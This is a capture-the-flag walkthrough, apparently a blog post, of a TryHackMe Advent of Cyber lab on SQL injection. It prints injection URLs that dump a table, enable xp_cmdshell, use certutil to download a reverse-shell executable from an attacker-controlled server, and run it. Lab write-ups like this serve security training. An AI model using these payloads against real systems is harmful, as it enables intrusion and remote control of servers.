TryHackMe: Advent of Cyber 2023 (Day 10) Inject the Halls with EXEC Queries

5 min readDec 20, 2023

“The Best Festival Company started receiving many reports that their company website, bestfestival.thm, is displaying some concerning information about the state of Christmas this year! After looking into the matter, Santa’s Security Operations Center (SSOC) confirmed that the company website has been hijacked and ultimately defaced, causing significant reputational damage. To make matters worse, the web development team has been locked out of the web server as the user credentials have been changed. With no other way to revert the changes, Elf Exploit McRed has been tasked with attempting to hack back into the server to regain access.”

It looks like a hacker is on the dark web auctioning off a bunch of Best Festival Company vulnerabilities.

“This forum post surely explains the havoc that has gone on over the past week. Armed with this knowledge, Elf Exploit McRed began testing the company website from the outside to find the vulnerable components that led to the server compromise. As a result of McRed’s thorough investigation, the team now suspects a possible SQL injection vulnerability.”

And honestly, I’m not surprised at this point. Their cybersecurity posture has been in shambles for years. Every Christmas another disaster.

Q1: Manually navigate the defaced website to find the vulnerable search form. What is the first webpage you come across that contains the gift-finding feature?

Here is the defaced website, lol.

If you scroll down a little ways you can see a link for the gift search feature.

Q2: Analyze the SQL error message that is returned. What ODBC Driver is being used in the back end of the website?

This is the part of the website that accepts user input:

If you mess with the parameters and hit search, you can look at the URL to see what areas are potentially vulnerable to SQL injection.

http://xx.xx.xx.xxx/giftresults.php?age=child&interests=gadgets&budget=20

I replaced the age parameter with ’ and was able to generate a SQL error.

http://xx.xx.xx.xxx/giftresults.php?age=’&interests=gadgets&budget=20

Q3: Inject the 1=1 condition into the Gift Search form. What is the last result returned in the database?

I changed the URL to dump all of the gift results and found a flag at the end.

http://xx.xx.xx.xxx/giftresults.php?age=’ OR 1=1 --&interests=toys&budget=20

Q4: What flag is in the note file Gr33dstr left behind on the system?

I enabled xp_cmdshell on the SQL server by passing this URL in the browser. This will eventually allow you to perform remote code execution on the server.

http://xx.xx.xx.xxx/giftresults.php?age='; EXEC sp_configure ‘show advanced options’, 1; RECONFIGURE; EXEC sp_configure ‘xp_cmdshell’, 1; RECONFIGURE; —

You don’t get any confirmation that this was successful via the web browser, but switch to command line for the next part, which will create an executable for a reverse shell.

Give that about 1 minute or so, and you should see this:

The next step is setting up a lightweight server on port 8000, which we can use to connect to the SQL server to deliver the executable.

Head back to the browser in order to use xp_cmdshell to download the executable. The first IP is the webpage and the second is whatever attackbox you are using.

http://xx.xx.xx.xxx/giftresults.php?age='; EXEC xp_cmdshell ‘certutil -urlcache -f http://xx.xx.xx.xxx:8000/reverse.exe C:\Windows\Temp\reverse.exe’; —

You can see that it worked by looking at back your lightweight server. You should see some GET requests like this:

Now, open up another terminal to set up a listener on port 4444.

And now BACK to the browser to send one more command through xp_cmdshell. This will execute reverse.exe and finally give us access to the reverse shell.

http://xx.xx.xx.xxx/giftresults.php?age='; EXEC xp_cmdshell ‘C:\Windows\Temp\reverse.exe’; —

Your shell is now ready for you back at the listener.